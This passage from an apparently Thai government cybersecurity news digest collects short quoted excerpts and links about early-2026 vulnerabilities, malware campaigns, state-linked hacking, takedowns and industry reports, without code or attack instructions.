  "The User Registration & Membership – Custom Registration Form Builder, Custom Login Form, User Profile, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to improper privilege management in all versions up to, and including, 5.1.2. This is due to the plugin accepting a user-supplied role during membership registration without properly enforcing a server-side allowlist. This makes it possible for unauthenticated attackers to create administrator accounts by supplying a role value during membership registration."
  https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/user-registration/user-registration-membership-512-unauthenticated-privilege-escalation-via-membership-registration
  https://www.bleepingcomputer.com/news/security/wordpress-membership-plugin-bug-exploited-to-create-admin-accounts/
• ContextCrush Flaw Exposes AI Development Tools To Attacks
  "A critical vulnerability affecting the Context7 MCP Server, a widely used tool for delivering documentation to AI coding assistants, has been disclosed by security researchers. The issue, dubbed ContextCrush, could allow attackers to inject malicious instructions into AI development tools through a trusted documentation channel. The flaw was discovered by Noma Labs researchers in the Context7 platform operated by Upstash. Context7 is used by developers to provide AI assistants such as Cursor, Claude Code and Windsurf with up-to-date library documentation directly inside integrated development environments."
  https://www.infosecurity-magazine.com/news/contextcrush-ai-development-tools/
• CISA Adds Five Known Exploited Vulnerabilities To Catalog
  "CISA has added five new vulnerabilities to its Known Exploited Vulnerabilities (KEV) Catalog, based on evidence of active exploitation.
  CVE-2017-7921 Hikvision Multiple Products Improper Authentication Vulnerability
  CVE-2021-22681 Rockwell Multiple Products Insufficient Protected Credentials Vulnerability
  CVE-2021-30952 Apple Multiple Products Integer Overflow or Wraparound Vulnerability
  CVE-2023-41974 Apple iOS and iPadOS Use-After-Free Vulnerability
  CVE-2023-43000 Apple Multiple products Use-After-Free Vulnerability"
  https://www.cisa.gov/news-events/alerts/2026/03/05/cisa-adds-five-known-exploited-vulnerabilities-catalog

Malware

• UAT-9244 Targets South American Telecommunication Providers With Three New Malware Implants
  "AT-9244 used dynamic-link library (DLL) side-loading to activate multiple stages of their infection chain. The actor executed “wsprint[.]exe”, a benign executable that loaded the malicious DLL-based loader “BugSplatRc64[.]dll”. The DLL reads a data file named “WSPrint[.]dll” from disk, decrypts its contents, and executes them in memory to activate TernDoor, the final payload. TernDoor is a variant of CrowDoor, a backdoor deployed in recent intrusions linked to China-nexus APTs such as FamousSparrow and Earth Estries. CrowDoor is a variant of SparrowDoor, another backdoor attributed to FamousSparrow. CrowDoor has also been observed in previous Tropic Trooper intrusions, indicating a close operational relationship with FamousSparrow."
  https://blog.talosintelligence.com/uat-9244/
  https://www.bleepingcomputer.com/news/security/chinese-state-hackers-target-telcos-with-new-malware-toolkit/

• ClipXDaemon: Autonomous X11 Clipboard Hijacker Delivered Via Bincrypter-Based Loader
  "In early February 2026, Cyble Research & Intelligence Labs (CRIL) identified a new Linux malware strain delivered through a loader structure previously associated with ShadowHS activity. While ShadowHS samples deployed post-exploitation tooling, the newly observed payload is operationally different. We have named it ClipXDaemon, an autonomous cryptocurrency clipboard hijacker targeting Linux X11 environments."
  https://cyble.com/blog/clipxdaemon-autonomous-x11-clipboard-hijacker/

• New BoryptGrab Stealer Targets Windows Users Via Deceptive GitHub Pages
  "We recently found the existence of a new stealer binary that collects browser and cryptocurrency wallet data, system information, and common files, among others. We designated this new stealer BoryptGrab. Certain variants of the stealer can download a PyInstaller backdoor, which we refer to as TunnesshClient. TunnesshClient establishes a reverse Secure Shell (SSH) tunnel to enable comunication with the attacker."
  https://www.trendmicro.com/en_us/research/26/c/boryptgrab-stealer-targets-users-via-deceptive-github-pages.html

• Bing AI Promoted Fake OpenClaw GitHub Repo Pushing Info-Stealing Malware
  "Fake OpenClaw installers hosted in GitHub repositories and promoted by Microsoft Bing’s AI-enhanced search feature instructed users to run commands that deployed information stealers and proxy malware. OpenClaw is an open-source AI agent that gained popularity as a personal assistant capable of executing tasks. It has access to local files and can integrate with email, messaging apps, and online services. Due to its widespread local access, threat actors saw an opportunity to collect sensitive information by publishing malicious skills (instruction files) on the tool's official registry and GitHub."
  https://www.bleepingcomputer.com/news/security/bing-ai-promoted-fake-openclaw-github-repo-pushing-info-stealing-malware/

• Wikipedia Hit By Self-Propagating JavaScript Worm That Vandalized Pages
  "The Wikimedia Foundation suffered a security incident today after a self-propagating JavaScript worm began vandalizing pages and modifying user scripts across multiple wikis. Editors first reported the incident on Wikipedia's Village Pump (technical), where users noticed a large number of automated edits adding hidden scripts and vandalism to random pages. Wikimedia engineers temporarily restricted editing across projects while they investigated the attack and began reverting changes."
  https://www.bleepingcomputer.com/news/security/wikipedia-hit-by-self-propagating-javascript-worm-that-vandalized-pages/

• APT36: A Nightmare Of Vibeware
  "Pakistan-based threat actor APT36, also known as Transparent Tribe, has pivoted from off-the-shelf malware to "vibeware", an AI-driven development model that produces a high-volume, mediocre mass of implants. Using niche languages like Nim, Zig, and Crystal, the actor seeks to evade standard detection engines while leveraging trusted cloud services, including Slack, Discord, Supabase, and Google Sheets, for command and control."
  https://businessinsights.bitdefender.com/apt36-nightmare-vibeware
  https://www.darkreading.com/cyberattacks-data-breaches/nation-state-actor-ai-malware-assembly-line
  https://www.bankinfosecurity.com/nation-state-hackers-play-vibes-a-30920
  https://hackread.com/pakistan-apt36-indian-govt-networks-ai-vibeware/

• Seedworm: Iranian APT On Networks Of U.S. Bank, Airport, Software Company
  "The Iranian APT group Seedworm (aka MuddyWater, Temp Zagros, Static Kitten) has been active on the networks of multiple U.S. companies since the beginning of February 2026, with activity continuing in recent days following U.S. and Israeli military strikes on Iran that have sparked conflict in the region. A U.S. bank, software company and airport, and non-governmental organizations in both the U.S. and Canada, have experienced suspicious activity on their networks in recent days and weeks. The software company is a supplier to the defense and aerospace industries among others, and has a presence in Israel, with the company’s Israel operation seeming to be the target in this activity."
  https://www.security.com/threat-intelligence/iran-cyber-threat-activity-us
  https://www.theregister.com/2026/03/05/mudywater_backdoor_us_networks/

• FBI Targeted With ‘suspicious’ Activity On Its Networks
  "The FBI found evidence that its networks had been targeted in a suspected cybersecurity incident, the bureau confirmed on Thursday, without sharing any further details. “The FBI identified and addressed suspicious activities on FBI networks, and we have leveraged all technical capabilities to respond,” the agency said in a statement. “We have nothing additional to provide.”"
  https://cyberscoop.com/fbi-targeted-with-suspicious-activity-on-its-networks/

• LIMINAL PANDA: China’s Emerging Espionage Threat In The Semiconductor And Technology Sectors
  "LIMINAL PANDA, a suspected China-nexus cyber-espionage actor, has recently emerged as an active player in the global threat landscape. The group began operating around 2020 and has focused its intelligence collection on a range of high-value targets in East Asia, Southeast Asia, and Western nations engaged in research and development of advanced technologies, including semiconductors, defense technologies, and telecommunications. While not a well-known actor (yet) like APT41 or Mustang Panda, LIMINAL PANDA shows an accelerating trajectory of evolution in capabilities, experimenting with the convergence of more traditional phishing criminal enterprises with sophisticated cloud exploitation and supply chain compromise."
  https://brandefense.io/blog/liminal-panda-apt-group/

• Breaches/Hacks/Leaks

• New Jersey County Says Malware Attack Took Down Phone Lines, IT Systems
  "One of the largest counties in New Jersey is dealing with a cyberattack that disrupted the phone lines and IT systems used across government offices. Passaic County, home to nearly 600,000 people in Northern New Jersey, published a statement on Wednesday evening warning residents that it is aware of a “malware attack” affecting county IT systems and phone lines. “Our team is actively working with federal and state officials to investigate and contain the issue,” the county said."
  https://therecord.media/new-jersey-county-says-malware-attack-took-down-phones

General News

• Phobos Ransomware Admin Pleads Guilty To Wire Fraud Conspiracy
  "A Russian national pleaded guilty to a wire fraud conspiracy charge related to his role in administering the Phobos ransomware operation, which breached hundreds of victims worldwide. Phobos is a long-running ransomware-as-a-service (RaaS) operation linked to the Crysis ransomware family. Phobos has been widely distributed through many affiliates, accounting for roughly 11% of all submissions to the ID Ransomware service between May 2024 and November 2024. The U.S. Department of Justice says the ransomware gang has collected ransom payments worth more than $39 million million from over 1,000 public and private entities worldwide."
  https://www.bleepingcomputer.com/news/security/phobos-ransomware-admin-pleads-guilty-to-wire-fraud-conspiracy/
  https://therecord.media/phobos-ransomware-leader-facing-20-years
  https://www.securityweek.com/russian-ransomware-operator-pleads-guilty-in-us/
  https://cyberscoop.com/phobos-ransomware-leader-guilty/
  https://securityaffairs.com/188984/security/phobos-ransomware-admin-faces-up-to-20-years-after-guilty-plea.html
• LatAm Now Faces 2x More Cyberattacks Than US
  "Nowhere in the world has cyber threat activity been growing faster than in Latin America, thanks in part to relatively rapid digital adoption on the part of businesses in the region, combined with relatively stagnant cybersecurity growth. Last year, researchers at Check Point tracked a 53% year-over-year rise in weekly cyberattacks in Latin America, and as of 2026, they confirmed it to be the most heavily targeted region on the planet."
  https://www.darkreading.com/threat-intelligence/latam-2x-more-cyberattacks-us
• That Attractive Online Ad Might Be a Malware Trap
  "Malware increasingly travels through the infrastructure that delivers online advertising. The Media Trust’s Global Report on Digital Trust, Ad Integrity, and the Protection of People describes a digital ad ecosystem where scam campaigns, malicious redirects, and malware delivery appear alongside marketing traffic. The financial impact of these threats continues to grow. Estimated consumer and business losses in the United States tied to malware, scams, and ad-borne fraud exceeded $12.5 billion in 2025. Exposure also remains widespread among internet users. Seven in ten adults reported encountering a digital scam or phishing attempt during the previous 12 months."
  https://www.helpnetsecurity.com/2026/03/05/the-media-trust-ad-malware-risks-report/
• As AI Agents Start Making Purchases, Security Teams Must Rethink Risk
  "In this Help Net Security interview, Donald Kossmann, CTO at fintech company Chargebacks911, talks about the emerging security, fraud, and governance risks of “agentic commerce,” where AI agents can autonomously make purchasing decisions on behalf of users or organizations. He explains that as AI agents gain the ability to shop, negotiate prices, select suppliers, and execute transactions independently, traditional assumptions about digital commerce begin to break down."
  https://www.helpnetsecurity.com/2026/03/05/donald-kossmann-chargebacks911-agentic-commerce-security-risks/
• Look What You Made Us Patch: 2025 Zero-Days In Review
  "Google Threat Intelligence Group (GTIG) tracked 90 zero-day vulnerabilities exploited in-the-wild in 2025. Although that volume of zero-days is lower than the record high observed in 2023 (100), it is higher than 2024’s count (78) and remained within the 60–100 range established over the previous four years, indicating a trend toward stabilization at these levels."
  https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review
  https://www.bleepingcomputer.com/news/security/google-says-90-zero-days-were-exploited-in-attacks-last-year/
  https://therecord.media/google-says-90-zero-days-exploited-apt-spyware-vendors
  https://www.securityweek.com/google-half-of-2025s-90-exploited-zero-days-aimed-at-enterprises/
  https://www.theregister.com/2026/03/05/zero_day_attacks_enterprise_tech_record/
• 2026 Browser Data Reveals Major Enterprise Security Blind Spots
  "The 2026 State of Browser Security Report is now available, revealing how the browser has rapidly become the most critical and least protected control point in the enterprise. It also highlights 2025 as the tipping point when AI-native browsers shifted from experimental tools to mainstream business platforms. Over the past twelve months, the browser evolved from a gateway to SaaS into something far more powerful and far more complex. AI copilots became embedded directly into business applications. Standalone generative AI tools became daily work companions. And a new class of AI-enhanced browsers began reshaping how users search, summarize, write, code, and automate tasks."
  https://www.bleepingcomputer.com/news/security/2026-browser-data-reveals-major-enterprise-security-blind-spots/
• 62 People Indicted By Taiwanese Prosecutors Over Ties To Cyber Scam Company Prince Group
  "Prosecutors in Taipei indicted 62 people and 13 companies for their involvement in cyber scam operations organized throughout Asia by the Prince Group. The Taipei District Prosecutors Office initiated its investigation in October after Chen Zhi, the founder of the Prince Group, was indicted by U.S. prosecutors on money laundering charges."
  https://therecord.media/62-indicted-taiwan-prince-group-scams
• AI-Driven Insider Risk Now a “Critical Business Threat,” Report Warns
  "The risk of insider threats is on the rise and businesses are concerned about the cybersecurity implications of intentionally malicious or negligent employees, research by Mimecast has warned. According to the company’s State of Human Risk Report 2026, internal cybersecurity risk has grown across the board, to the extent that it should be treated as a “critical business threat.” In many cases, the additional insider risk is because of employees mishandling or actively abusing AI tools"
  https://www.infosecurity-magazine.com/news/ai-insider-risk-critical-business/

อ้างอิง
Electronic Transactions Development Agency (ETDA)

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

• Cybersecurity Is Now The Price Of Admission For Industrial AI
  "Industrial organizations are accelerating AI deployment across manufacturing, utilities, and transportation and running straight into a security problem. Cisco’s 2026 State of Industrial AI Report, based on responses from more than 1,000 decision-makers across 19 countries, finds that cybersecurity has become the single largest obstacle to AI adoption, outranking skills gaps, integration challenges, and budget constraints. The shift is notable. In 2024, cybersecurity ranked third among external growth obstacles. By 2026, 40% of respondents cite it as a top barrier to AI adoption specifically, and 48% name it as their biggest networking challenge overall. The rise reflects the reality that connecting more assets and systems to support AI expands the attack surface in ways that traditional security approaches were not designed to handle."
  https://www.helpnetsecurity.com/2026/03/04/cisco-industrial-ai-cybersecurity/

New Tooling

• Mquire: Open-Source Linux Memory Forensics Tool
  "Linux memory forensics has long depended on debug symbols tied to specific kernel versions. These symbols are not installed on production systems by default, and sourcing them from external repositories creates a recurring problem: repositories go stale, kernel builds diverge, and analysts working incident response often find no published symbols for the exact kernel they need to examine. Trail of Bits published mquire to address this constraint. The open-source tool analyzes Linux memory dumps without requiring any external debug information."
  https://www.helpnetsecurity.com/2026/03/04/mquire-open-source-linux-memory-forensics-tool/
  https://github.com/trailofbits/mquire

Vulnerabilities

• Cisco Warns Of Max Severity Secure FMC Flaws Giving Root Access
  "Cisco has released security updates to patch two maximum-severity vulnerabilities in its Secure Firewall Management Center (FMC) software. Secure FMC is a web or SSH-based interface for admins to manage Cisco firewalls and configure application control, intrusion prevention, URL filtering, and advanced malware protection. Both vulnerabilities can be exploited remotely by unauthenticated attackers: the authentication bypass flaw (CVE-2026-20079) allows attackers to gain root access to the underlying operating system, while the remote code execution (RCE) vulnerability (CVE-2026-20131) lets them execute arbitrary Java code as root on unpatched devices."
  https://www.bleepingcomputer.com/news/security/cisco-warns-of-max-severity-secure-fmc-flaws-giving-root-access/
  https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-onprem-fmc-authbypass-5JPp45V2
  https://securityaffairs.com/188921/security/cisco-fixes-maximum-severity-secure-fmc-bugs-threatening-firewall-security.html
• Sometimes, You Can Just Feel The Security In The Design (Juniper Junos Evolved CVE-2026-21902 Pre-Auth RCE)
  "On today’s ‘good news disguised as other things’ segment, we’re turning our gaze to CVE-2026-21902 - a recently disclosed “Incorrect Permission Assignment for Critical Resource” vulnerability affecting Juniper’s Junos OS Evolved platform. This vulnerability affects only Juniper’s PTX Series of devices, apparently."
  https://labs.watchtowr.com/sometimes-you-can-just-feel-the-security-in-the-design-junos-os-evolved-cve-2026-21902-rce/
  https://www.bankinfosecurity.com/juniper-ptx-routers-at-risk-critical-takeover-flaw-disclosed-a-30904
• Mail2Shell – CVE-2026-28289: New Zero-Click RCE On FreeScout
  "A few days ago, we published research detailing a FreeScout vulnerability that allowed authenticated attackers to achieve full system compromise via RCE – originally reported by Offensive.sa. On the same day, we discovered a patch bypass that allowed us to reproduce the same RCE on newly updated servers, demonstrating how quickly incomplete fixes can be circumvented. During our deeper analysis, we escalated the attack chain further — converting it into a Zero‑Click RCE. By sending a single crafted email to any address configured in FreeScout, an attacker can execute code on the server without authentication and without user interaction."
  https://www.ox.security/blog/freescout-rce-cve-2026-28289/
  https://www.bleepingcomputer.com/news/security/mail2shell-zero-click-attack-lets-hackers-hijack-freescout-mail-servers/
  https://www.securityweek.com/critical-freescout-vulnerability-leads-to-full-server-compromise/
• Over 1,200 IceWarp Servers Still Vulnerable To Unauthenticated RCE Flaw (CVE-2025-14500)
  "A critical RCE vulnerability (CVE-2025-14500) in IceWarp, an EU-made business communication and collaboration platform, may be exploited by attackers to gain unauthorized access to exposed unpatched servers. According to the Shadowserver Foundation, there are currently over 1,200 internet-facing instances that have yet to receive a fix, and the organization is sending out alerts to the owners, urging them to update."
  https://www.helpnetsecurity.com/2026/03/04/icewarp-rce-cve-2025-14500/

Malware

• Fake LastPass Support Email Threads Try To Steal Vault Passwords
  "Password management software provider LastPass is warning users of a phishing campaign targeting its users with fake unauthorized account access alerts. The emails impersonate a LastPass representative by spoofing the display name and use subject lines crafted to mimic forwarded internal conversations between attackers and the company’s customer support team about a request to change the account’s primary email address. The email chains are forwarded to the target in an attempt to prompt them to respond to the suspicious activity with urgency and click on links named “report suspicious activity,” “disconnect and lock vault,” and “revoke device.”"
  https://www.bleepingcomputer.com/news/security/fake-lastpass-support-email-threads-try-to-steal-vault-passwords/
  https://securityaffairs.com/188911/security/lastpass-warns-of-spoofed-alerts-aimed-at-stealing-master-passwords.html
  https://www.securityweek.com/lastpass-warns-of-new-phishing-campaign/
• Hacker Mass-Mails HungerRush Extortion Emails To Restaurant Patrons
  "Customers of restaurants using the HungerRush point-of-sale (POS) platform say they received emails from a threat actor attempting to extort the company, warning that restaurant and customer data could be exposed if HungerRush fails to respond. HungerRush is a restaurant technology provider that offers point-of-sale (POS), online ordering, delivery management, and payment processing software to help restaurants manage orders, customer information, and business operations. The company claims to work with over 16,000 restaurants, including Sbarro, Jet's Pizza, Fajita Pete's, Hungry Howie's, and many more."
  https://www.bleepingcomputer.com/news/security/hacker-mass-mails-hungerrush-extortion-emails-to-restaurant-patrons/
• How a Brute Force Attack Unmasked a Ransomware Infrastructure Network
  "To most defenders, another brute-force alert on exposed RDP is background noise — bread-and-butter activity you triage and move past. For the Huntress Tactical Response Team, one of those “routine” alerts turned into something very different. As we pulled on a single successful login, we uncovered unusual credential-hunting behavior, a web of geo-distributed infrastructure, and a shady VPN service that all pointed toward a ransomware-as-a-service ecosystem and its initial access brokers. This post walks through how a noisy brute-force campaign became our doorway into that operation."
  https://www.bleepingcomputer.com/news/security/how-a-brute-force-attack-unmasked-a-ransomware-infrastructure-network/
• Signed Malware Impersonating Workplace Apps Deploys RMM Backdoors
  "In February 2026, Microsoft Defender Experts identified multiple phishing campaigns attributed to an unknown threat actor. The campaigns used workplace meeting lures, PDF attachments, and abuse of legitimate binaries to deliver signed malware. Phishing emails directed users to download malicious executables masquerading as legitimate software. The files were digitally signed using an Extended Validation (EV) certificate issued to TrustConnect Software PTY LTD. Once executed, the applications installed remote monitoring and management (RMM) tools that enabled the attacker to establish persistent access on compromised systems."
  https://www.microsoft.com/en-us/security/blog/2026/03/03/signed-malware-impersonating-workplace-apps-deploys-rmm-backdoors/
  https://hackread.com/fake-zoom-teams-invites-malware-certificates/
• Telegram As The New Operational Layer Of Cyber Threat Activity
  "Telegram is no longer just a messaging application. It has evolved into a primary operational playground for modern threat actors. What underground forums on Tor once represented, Telegram now replicates — but faster, more scalable, and significantly more accessible. Over the past few years, elements of the cybercriminal ecosystem have progressively shifted away from traditional darknet marketplaces and closed forums toward Telegram’s hybrid architecture of public channels, private groups, and automated bots. The barriers that once required Tor access, reputation building, and escrow systems have been replaced with instant channel creation, subscription-based malware distribution, real-time broadcasting, and bot-enabled commerce."
  https://www.cyfirma.com/research/telegram-as-the-new-operational-layer-of-cyber-threat-activity/
  https://hackread.com/telegram-used-sell-access-malware-stolen-logs/
• Retaliatory Hacktivist DDoS Activity Following Operation Epic Fury/Roaring Lion
  "Since late February 2026, the Middle East has experienced unprecedented kinetic warfare. Following the collapse of nuclear negotiations and a period of internal Iranian instability, a massive, coordinated military campaign dubbed Operation Epic Fury by the United States, also known as Operation Roaring Lion in Israel, was launched on February 28, 2026. This military offensive, which resulted in the death of Iran’s supreme leader and the destruction of over 2,000 strategic targets, has acted as a primary catalyst for global hacktivist mobilization. As the physical conflict expands across many countries in the region, pro-Iranian and allied "axis of resistance" hacktivist groups have pivoted from baseline activity to aggressive, retaliatory distributed denial of service (DDoS) campaigns targeting government and financial infrastructure across the Middle East."
  https://www.radware.com/security/threat-advisories-and-attack-reports/ddos-activity-following-operation-epic-fury-roaring-lion/
  https://thehackernews.com/2026/03/149-hacktivist-ddos-attacks-hit-110.html
• Malicious Packagist Packages Disguised As Laravel Utilities Deploy Encrypted RAT
  "Socket's Threat Research Team identified a remote access trojan (RAT) distributed across multiple Packagist (PHP) packages published by the threat actor nhattuanbl (nhattuanbl@gmail[.]com). Two packages, nhattuanbl/lara-helper and nhattuanbl/simple-queue, ship an identical payload in src/helper.php. A third package, nhattuanbl/lara-swagger, carries no malicious code itself but lists nhattuanbl/lara-helper as a hard Composer dependency, meaning that installing it pulls in the RAT automatically."
  https://socket.dev/blog/malicious-packagist-packages-disguised-as-laravel-utilities
  https://thehackernews.com/2026/03/fake-laravel-packages-on-packagist.html
• Interplay Between Iranian Targeting Of IP Cameras And Physical Warfare In The Middle East
  "As highlighted in the Cyber Security Report 2026, cyber operations have increasingly become an additional tool in interstate conflicts, used both to support military operations and to enable ongoing battle damage assessment (BDA). During the 12-day conflict between Israel and Iran in June 2025, the compromise of cameras was likely used to support BDA and/or target-correction efforts. In the current Middle East conflict, Check Point Research has observed intensified targeting of cameras beginning in the first hours of hostilities, including a sharp increase in exploitation attempts against IP cameras not only in Israel but also across Gulf countries: specifically the UAE, Qatar, Bahrain, and Kuwait, as well as similar activity in Lebanon and Cyprus. This activity originated from multiple attack infrastructures that we attribute to several Iran-nexus threat actors."
  https://research.checkpoint.com/2026/interplay-between-iranian-targeting-of-ip-cameras-and-physical-warfare-in-the-middle-east/
  https://www.theregister.com/2026/03/04/iranian_hacking_attempts_ip_cameras/
• “Malware, From The Outside!”: How a Threat Actor Used Fake OpenClaw Installers To Infect Systems With GhostSocks And Information Stealers
  "Information stealers continue to be an initial access vector for severe attacks against publicly facing systems, such as the Snowflake customer database compromise in 2024, and a Romanian oil pipeline operator compromise in 2026. This blog details an investigation into malicious GitHub repositories posing as OpenClaw installers that were available between the 2nd and 10th of February 2026. The OpenClaw installers were fake with low detection rates, and distributed information stealers that used a novel packer called Stealth Packer."
  https://www.huntress.com/blog/openclaw-github-ghostsocks-infostealer
  https://www.theregister.com/2026/03/04/fake_openclaw_installers_malware/

General News

• United States Leads Dismantlement Of One Of The World’s Largest Hacker Forums
  "The Department of Justice announced today the seizure of the LeakBase database, one of the world’s largest online forums for cybercriminals to buy and sell stolen data and cybercrime tools. According to an affidavit unsealed on March 3, the LeakBase forum had over 142,000 members and more than 215,000 messages between members. Available on the open web and in English, the forum had an enormous and continuously updated archive of hacked databases including many from high profile attacks, including hundreds of millions of account credentials."
  https://www.justice.gov/opa/pr/united-states-leads-dismantlement-one-worlds-largest-hacker-forums
  https://www.bleepingcomputer.com/news/security/fbi-seizes-leakbase-cybercrime-forum-data-of-142-000-members/
  https://therecord.media/leakbase-cybercrime-fbi-europe-takedown
  https://cyberscoop.com/leakbase-cybercrime-forum-seized/
• Global Phishing-As-a-Service Platform Taken Down In Coordinated Public-Private Action
  "A major phishing-as-a-service platform used to bypass multi-factor authentication (MFA) and enable large-scale account compromise has been disrupted following a coordinated international operation supported by Europol. The service, known as Tycoon 2FA, provided cybercriminals with a subscription-based toolkit designed to intercept live authentication sessions and gain unauthorised access to online accounts, including those protected by additional security layers."
  https://www.europol.europa.eu/media-press/newsroom/news/global-phishing-service-platform-taken-down-in-coordinated-public-private-action
  https://www.trendmicro.com/en_us/research/26/c/tycoon2fa-takedown.html
  https://www.proofpoint.com/us/blog/threat-insight/disruption-targets-tycoon-2fa-popular-aitm-phaas
  https://www.bleepingcomputer.com/news/security/europol-coordinated-action-disrupts-tycoon2fa-phishing-platform/
  https://cyberscoop.com/tycoon-2fa-phishing-kit-takedown-microsoft/
  https://www.infosecurity-magazine.com/news/global-takedown-tycoon2fa-phishing/
  https://www.securityweek.com/tycoon-2fa-phishing-platform-dismantled-in-global-takedown/
• The Whitelist Illusion – When Your Trusted List Becomes a Billion Dollar Attack Path
  "When a bank or institution holds significant digital assets on a public blockchain, something unique happens: every aspect of their security posture becomes visible to attackers. On-chain balances are public. Transaction patterns are traceable. The addresses you interact with, your whitelist, are not a secret. They are broadcast to the entire world with every transaction. For professional threat groups, particularly state-sponsored actors like North Korea’s Lazarus Group (responsible for over $2B in crypto theft since 2017), this transparency is a gift. They don’t need to guess your security architecture. They can map it."
  https://blog.checkpoint.com/crypto/the-whitelist-illusion-when-your-trusted-list-becomes-a-billion-dollar-attack-path/
• The Most Common Swap Scams In 2026, And How To Avoid Them
  "Crypto swaps are fast and permissionless, which is exactly why scammers love them. Before you hit “Swap,” decide where you’ll execute: a DEX router you trust (Uniswap, 1inch) or a centralized venue where you can sanity-check tickers, fees, and withdrawals (Binance, Kraken, Coinbase). A simple way to cut risk is by reducing unknown interfaces and “too-good-to-be-true” rate widgets. If you’re comparing venues, using a low fee crypto exchange can help you avoid hidden costs scammers often mask with wide spreads or fake fee breakdowns, especially if you stick to well-known brands and consistent workflows."
  https://hackread.com/common-swap-scams-2026-how-to-avoid/
• Cybersecurity Professionals Are Burning Out On Extra Hours Every Week
  "Cybersecurity professionals in the U.S. are working an average of 10.8 extra hours per week beyond their contracted schedules, according to survey data collected from 300 cybersecurity and IT leaders by Sapio Research. That figure effectively adds a sixth working day to the standard week for a large portion of the field. Nearly half of respondents reported working 11 or more overtime hours weekly, and one in five logged more than 16 additional hours. The psychological strain is measurable. Nearly half of respondents said their job feels emotionally exhausting more often than it feels rewarding, a sentiment most pronounced among C-level executives. A significant share said they are unable to take time off without returning to a significant backlog of stress, and roughly a third reported weekly anticipatory anxiety about the upcoming work week."
  https://www.helpnetsecurity.com/2026/03/04/ciso-cybersecurity-workforce-burnout/
• Why Workforce Identity Is Still a Vulnerability, And What To Do About It
  "Most organizations believe they have workforce identity under control. New hires are verified. Accounts are provisioned. Multi-factor authentication is enforced. Audits are passed. Then a breach happens, often through an account that was “properly secured.” But the problem can be traced back to the fact that identity verification, provisioning, authentication, and recovery operate as separate events, not a continuous system of trust. When trust breaks between those checkpoints, attackers don’t need to defeat strong authentication. They simply walk around it."
  https://www.helpnetsecurity.com/2026/03/04/workforce-identity-assurance/
• Mobile Malware Evolution In 2025
  "Starting from the third quarter of 2025, we have updated our statistical methodology based on the Kaspersky Security Network. These changes affect all sections of the report except for the installation package statistics, which remain unchanged. To illustrate trends between reporting periods, we have recalculated the previous year’s data; consequently, these figures may differ significantly from previously published numbers. All subsequent reports will be generated using this new methodology, ensuring accurate data comparisons with the findings presented in this article."
  https://securelist.com/mobile-threat-report-2025/119076/
• Automate Or Orchestrate? Implementing a Streamlined Remediation Program To Shorten MTTR
  "Almost all security teams want to reduce their Mean Time to Remediate (MTTR). And for good reason: research from 2024 found that it takes an average of 4.5 months to remediate critical vulnerabilities. The problem is that most organizations are going about it all wrong. Their approaches lack nuance: some teams respond to every exposure with a fire drill, others with a simple patch. Neither approach really works."
  https://securityaffairs.com/188917/security/automate-or-orchestrate-implementing-a-streamlined-remediation-program-to-shorten-mttr.html
• Threat Spotlight: The Business Risks Of Pirate Software
  "Over the last month, Barracuda’s SOC tools and analysts have detected multiple instances of users trying to download and activate pirate or cracked versions of software and unauthorized installers onto corporate endpoints. Pirate and cracked software are traditionally associated with gaming — players looking for free upgrades, enhancements or special hacks. Pirate software refers to programs that have been illegally copied, while cracked software refers to programs that have been modified to bypass licensing or protection mechanisms designed to prevent piracy."
  https://blog.barracuda.com/2026/03/04/threat-spotlight-business-risks-pirate-software
  https://www.securityweek.com/how-pirated-software-turns-helpful-employees-into-malware-delivery-agents/
• The Five Pillars Of Software Assurance In System Acquisition
  "Today’s systems are increasingly software-intensive and complex with a growing reliance on third-party technology. Through software reuse, systems can be assembled faster with less development cost. Traditionally, systems were primarily hardware-driven, and operational risks were primarily linked to reliability. Now systems are largely software-based. They do not wear out like hardware, so critical risks are different. Software components almost without exception contain vulnerabilities that are difficult to manage directly. Inheritance of these vulnerabilities through the supply chain, as more software is acquired, increases the management challenges and magnifies the risk of potential compromise. In addition, we have seen situations where suppliers unintentionally become propagators of malware and ransomware (e.g., SolarWinds) through features that provide automatic updates. Attacks on the software supply chain (e.g., Shai-Hulud, a self-replicating worm) are increasingly frequent and devastating."
  https://www.sei.cmu.edu/blog/the-five-pillars-of-software-assurance-in-system-acquisition/

อ้างอิง
Electronic Transactions Development Agency (ETDA)